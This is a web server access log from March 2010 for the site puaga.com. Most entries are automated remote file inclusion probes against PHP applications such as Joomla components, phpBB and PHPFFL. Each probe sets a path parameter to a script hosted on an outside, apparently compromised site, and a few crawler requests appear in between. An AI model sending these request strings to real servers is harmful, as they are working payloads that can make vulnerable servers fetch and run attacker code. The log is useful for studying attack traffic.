88.84.95.167 - - [07/Mar/2010:08:32:56 -0800] "GET /logs//index.php=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
88.84.95.167 - - [07/Mar/2010:08:32:56 -0800] "GET /index.php=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
88.84.95.167 - - [07/Mar/2010:08:33:00 -0800] "GET /errors.php?error=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
88.84.95.167 - - [07/Mar/2010:08:33:00 -0800] "GET /logs/errors.php?error=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:33:24 -0800] "GET /config.php?path_to_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:33:24 -0800] "GET /logs/config.php?path_to_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:33:24 -0800] "GET /config.php?path_to_root=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:33:25 -0800] "GET /logs/access_100217.log%20%20/config.php?path_to_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:33:26 -0800] "GET /logs/config.php?path_to_root=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:33:29 -0800] "GET /logs/access_100217.log%20%20/config.php?path_to_root=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:33:49 -0800] "GET /logs/access_100212.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:33:54 -0800] "GET /logs/access_100212.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:34:01 -0800] "GET /config.php?path_to_root=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:34:07 -0800] "GET /logs/access_100217.log%20%20/config.php?path_to_root=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:34:07 -0800] "GET /config.php?path_to_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:34:08 -0800] "GET /logs/config.php?path_to_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:34:09 -0800] "GET /logs/access_100217.log%20%20/config.php?path_to_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:08:34:17 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:08:34:17 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:08:34:19 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:34:46 -0800] "GET /logs/config.php?path_to_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:34:46 -0800] "GET /logs/access_100217.log%20%20/config.php?path_to_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:08:34:49 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:08:34:49 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:08:34:50 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:34:50 -0800] "GET /config.php?path_to_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [07/Mar/2010:08:35:22 -0800] "GET /bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [07/Mar/2010:08:35:22 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [07/Mar/2010:08:35:22 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:35:37 -0800] "GET /logs/access_100212.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:35:45 -0800] "GET /logs/access_100212.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [07/Mar/2010:08:35:54 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:08:36:02 -0800] "GET /logs/access_100215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:08:36:13 -0800] "GET /logs/access_100215.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:08:37:33 -0800] "GET /logs/access_100217.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:08:37:53 -0800] "GET /logs/access_100212.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:08:37:56 -0800] "GET /logs/access_100212.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.97 - - [07/Mar/2010:08:42:28 -0800] "GET /pictures/p11/ HTTP/1.0" 302 34450 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [07/Mar/2010:08:42:29 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [07/Mar/2010:08:42:29 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [07/Mar/2010:08:42:30 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [07/Mar/2010:08:42:30 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [07/Mar/2010:08:42:30 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
200.93.147.154 - - [07/Mar/2010:08:45:57 -0800] "GET /logs/access_100208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:45:58 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.249.65.178 - - [07/Mar/2010:08:46:03 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Googlebot-Image/1.0" "www.puaga.com"
66.249.65.178 - - [07/Mar/2010:08:46:03 -0800] "GET /pictures/gallery_r.jpg HTTP/1.1" 200 19016 "-" "Googlebot-Image/1.0" "www.puaga.com"
66.249.65.171 - - [07/Mar/2010:08:47:16 -0800] "GET /atesh_info/nt.php?t=3977782085 HTTP/1.1" 200 61 "-" "Googlebot-Image/1.0" "www.atesh.info"
200.93.147.154 - - [07/Mar/2010:08:47:27 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:47:30 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [07/Mar/2010:08:47:42 -0800] "GET /logs/access_100211.log//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [07/Mar/2010:08:47:42 -0800] "GET /logs/access_100217.log%20%20/config.php?path_to_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [07/Mar/2010:08:47:42 -0800] "GET /logs/config.php?path_to_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [07/Mar/2010:08:47:42 -0800] "GET /config.php?path_to_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [07/Mar/2010:08:47:46 -0800] "GET /logs/access_100214.log//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:48:02 -0800] "GET /logs/access_100217.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:49:04 -0800] "GET /logs/access_100217.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:08:49:25 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:08:49:25 -0800] "GET /bbs/write_update.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:08:49:25 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:08:49:25 -0800] "GET /bbs/write_update.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:08:49:25 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:08:49:25 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:08:50:03 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:08:50:05 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:08:50:32 -0800] "GET //bbs/write_comment_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:08:50:33 -0800] "GET /logs///bbs/write_comment_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:08:50:33 -0800] "GET /logs/access_100210.log%20%20///bbs/write_comment_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:08:50:51 -0800] "GET /logs/access_100202.log%20%20///bbs/write_comment_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [07/Mar/2010:08:50:51 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [07/Mar/2010:08:50:51 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [07/Mar/2010:08:50:51 -0800] "GET /bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [07/Mar/2010:08:50:56 -0800] "GET /logs/access_100214.log//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [07/Mar/2010:08:52:13 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.225.148 - - [07/Mar/2010:08:52:25 -0800] "GET /includes/dbal.php?eqdkp_root_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
72.3.225.148 - - [07/Mar/2010:08:52:25 -0800] "GET /logs/includes/dbal.php?eqdkp_root_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:52:32 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [07/Mar/2010:08:54:50 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Mar/2010:08:54:51 -0800] "GET /logs/access.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Mar/2010:08:54:51 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
208.77.223.114 - - [07/Mar/2010:08:55:25 -0800] "GET /includes/dbal.php?eqdkp_root_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
208.77.223.114 - - [07/Mar/2010:08:55:26 -0800] "GET /logs/includes/dbal.php?eqdkp_root_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
200.157.211.204 - - [07/Mar/2010:08:55:55 -0800] "GET /logs/access_100301.log/config.php?path_to_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.29.80.127 - - [07/Mar/2010:08:56:55 -0800] "GET /includes/dbal.php?eqdkp_root_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
72.29.80.127 - - [07/Mar/2010:08:56:56 -0800] "GET /logs/includes/dbal.php?eqdkp_root_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:00 -0800] "GET /logs/access_100224.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:00 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:00 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:57:01 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:57:01 -0800] "GET /bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:57:07 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:27 -0800] "GET /logs/access_100225.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:30 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:30 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:30 -0800] "GET /logs/access_100224.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:36 -0800] "GET /logs/access_100224.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:36 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:36 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [07/Mar/2010:08:57:38 -0800] "GET /logs/access_100217.log/config.php?path_to_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:51 -0800] "GET /logs/access_100225.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:57:56 -0800] "GET /logs/access_100225.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
